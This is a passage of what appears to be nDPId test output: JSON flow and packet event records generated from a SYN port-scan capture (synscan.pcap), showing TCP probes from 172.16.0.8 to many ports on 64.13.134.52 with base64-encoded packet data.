-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq6kAACYGdsmsEAAIQA2GNIzSFw\/dUoMYAAAAAGACDAAVgAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsKewAADoG5IasEAAIQA2GNIzSBCvdUoMYAAAAAGACDAAoZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsObQAAC0G4b6sEAAIQA2GNIzSD6PdUoMYAAAAAGACCAAg7AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAs3g8AACoGQGOsEAAIQA2GNIzShGvdUoMYAAAAAGACDACoIwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsLuQAAC0G7I6sEAAIQA2GNIzSHfzdUoMYAAAAAGACCAASkwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6MAADsGqc+sEAAIQA2GNIzSOGrdUoMYAAAAAGACEADwJAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsaAkAACYGummsEAAIQA2GNIzSemndUoMYAAAAAGACDACyJQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsT64AACsGzcSsEAAIQA2GNIzSBN\/dUoMYAAAAAGACEAAjsAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs7g4AADoGIGSsEAAIQA2GNIzSBR\/dUoMYAAAAAGACDAAncAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs1RQAACkGSl6sEAAIQA2GNIzSJr3dUoMYAAAAAGACCAAJ0gAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275058093,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACHppjNJGY57x3VKDGVAUAADweQAAAAAAAAAA"} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsYKcAACgGv8usEAAIQA2GNIzT\/ejdU4MZAAAAAGACBAA2owAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsfsIAADMGlrCsEAAIQA2GNIzTBjrdU4MZAAAAAGACEAAiUgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsa1MAAC8Grh+sEAAIQA2GNIzTPtDdU4MZAAAAAGACEADpuwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhYAADsG81ysEAAIQA2GNIzTgArdU4MZAAAAAGACEACogQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMvMAAC4G53+sEAAIQA2GNIzTEvDdU4MZAAAAAGACDAAZnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAspfkAADsGZ3msEAAIQA2GNIzTHmHdU4MZAAAAAGACEAAKKwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKRwAACUG+lasEAAIQA2GNIzTRdXdU4MZAAAAAGACCADqtgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAs13MAADUGO\/+sEAAIQA2GNIzTDyjdU4MZAAAAAGACCAAhZAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7gAADgG2LqsEAAIQA2GNIzTAgLdU4MZAAAAAGACBAAyigAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKvUAACsG8n2sEAAIQA2GNIzTN57dU4MZAAAAAGACEADw7QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAslWEAADoGeRGsEAAIQA2GNIzTB\/bdU4MZAAAAAGACDAAklgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsazkAADsGojmsEAAIQA2GNIzSIGPdUoMYAAAAAGACEAAILAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsLfQAADkG4X6sEAAIQA2GNIzSDvLdUoMYAAAAAGACCAAhnQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFwAAC8GcRasEAAIQA2GNIzSDAXdUoMYAAAAAGACEAAcigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 